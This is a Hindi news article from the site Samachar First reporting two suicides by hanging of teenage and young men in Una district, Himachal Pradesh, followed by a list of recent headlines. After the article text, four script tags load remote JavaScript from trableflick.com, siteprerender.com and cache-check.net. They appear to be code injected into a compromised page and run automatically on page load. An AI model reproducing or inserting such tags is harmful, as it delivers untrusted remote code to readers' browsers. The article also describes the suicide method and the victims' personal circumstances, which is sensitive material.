उनाः हरोली में 19 साल के युवक और गगरेट में 17 साल के युवक ने लगाया फंदा

<p>जिला ऊना में हरोली उपमंडल के गांव पालकवाह में 19 साल के युवक ने फंदा लगाकर अपनी जीवनलीला समाप्त करने का मामला सामने आया है। मृतक की पहचान दीपांश पुत्र कृष्ण कुमार उम्र लगभग 19 साल के रूप में हुई है। जानकारी के अनुसार युवक ने अपने ननिहाल में ही इस घटना को अंजाम दिया है। घटना की जानकारी मिलते ही मौके पर पहुंची हरोली पुलिस तफ्तीश में जुट गई है। रविवार को स्थानीय ग्राम पंचायत प्रधान&nbsp; के घर पर रह रहे उनके भांजे ने घर पर ही अचानक फंदा लगा लिया। घटना की जानकारी मिलते ही परिजन उसे इलाज के लिए हरोली अस्पताल ले आए। जहां पर उसकी नाजुक हालत को देखते हुए उसे ऊना अस्पताल के लिए रेफर किया जहां डॉक्टरों ने उसे मृत घोषित कर दिया।</p>

<p>बताया जा रहा है कि वह गांव पालकवाह में अपने ननिहाल में पिछले कुछ समय से अपनी माता और बहन के साथ रह रहा था। जबकि उसके पिता अन्य राज्य में नौकरी करते है। गौरतलब है कि मृतक युवक स्थानीय ग्राम पंचायत प्रधान का सगा भांजा है। पुलिस इस मामले की तफ्तीश में जुट गई है। मामले की पुष्टि करते हुए हरोली थाना प्रभारी रमन कुमार ने बताया कि पालकवाह में युवक ने घर पर फंदा लगाकर खुदख़ुशी की है। उन्होंने कहा कि फिलहाल मामले की तफ्तीश जारी है। तथ्यों के सामने आने पर आगामी कार्रवाई की जा रही है। उन्होंने बताया कि मृतक का पोस्टमार्टम करवाकर शव परिजनों के हवाले किया जा रहा है।</p>

<p>वहीं, उमंडल गगरेट के&nbsp; डंगोह मे एक 17 साल के युवक ने फंदा लगाकर अपनी जीवन लीला समाप्त कर दी। जानकारी के अनुसार युवक घर में अकेला था और घर में कोई नहीं था। मां कुछ समय पहले छोड़ कर जा चुकी है और बहन की शादी हो चुकी है। युवक का पिता पेंटर है और साथ के गांव मे ही काम करने गया हुआ था। आसपास दूर-दूर तक कोई घर भी नहीं है। युवक का पिता जब दोपहर में घर आया तो उसने देखा कि टीवी चल रहा था और युवक फंदे पर झूल रहा था। इस मामले की सूचना युवक के पिता ने थाना गगरेट को दी जिस पर मौके पर पहुंच कर पुलिस ने शव को कब्जे में लेकर जांच शुरू कर दी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1593343464301″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

चंडीगढ़ सेक्टर 42 कॉलेज में हिमाचल की बेटी ने प्रेरणा ने मारी बाजी

चंडीगढ़ सेक्टर-42 के गवर्नमेंट पीजी गर्ल्स कॉलेज में चल रही चुनाव में हिमाचल प्रदेश के…

17 hours ago

संजौली मस्जिद विवाद को लेकर एमसी आयुक्त के कोर्ट में सुनवाई

सबंधित जेई और वक्फ बोर्ड को लगी फटकार, मामले की 5 अक्टूबर को अगली सुनवाई,जेई…

17 hours ago

इंस्पायर मानक अवार्ड के लिए 15 सितंबर तक छात्र करवा सकते है आवेदन

हमीरपुर, कांगड़ा व चंबा के छात्र लेंगे भाग अभी तक कई स्कूलों ने नहीं किया…

17 hours ago

निबंध लेखन में रितिका ने हासिल किया पहला स्थान

भाषा-संस्कृति विभाग जिला कांगडा़ द्वारा जिला स्तरीय राजभाषा हिन्दीं पखवाडे का आयोजन जी.ए.वी स्कूल कांगडा…

18 hours ago

परशुराम चौक बाजार में जलभराव की समस्या से मिली निजात, व्यापारी खुश

पांवटा साहिब- शहर में जल भराव की समस्या से निपटने के लिए नगर निगम द्वारा…

18 hours ago

राज्य में खेल गतिविधियों को बढ़ावा देने के लिए प्रदेश सरकार प्रतिबद्धः केवल पठानिया

धर्मशाला, 6 सितम्बर: उपमुख्य सचेतक व विधायक शाहपुर केवल सिंह पठानिया ने आज शाहपुर विधानसभा…

1 day ago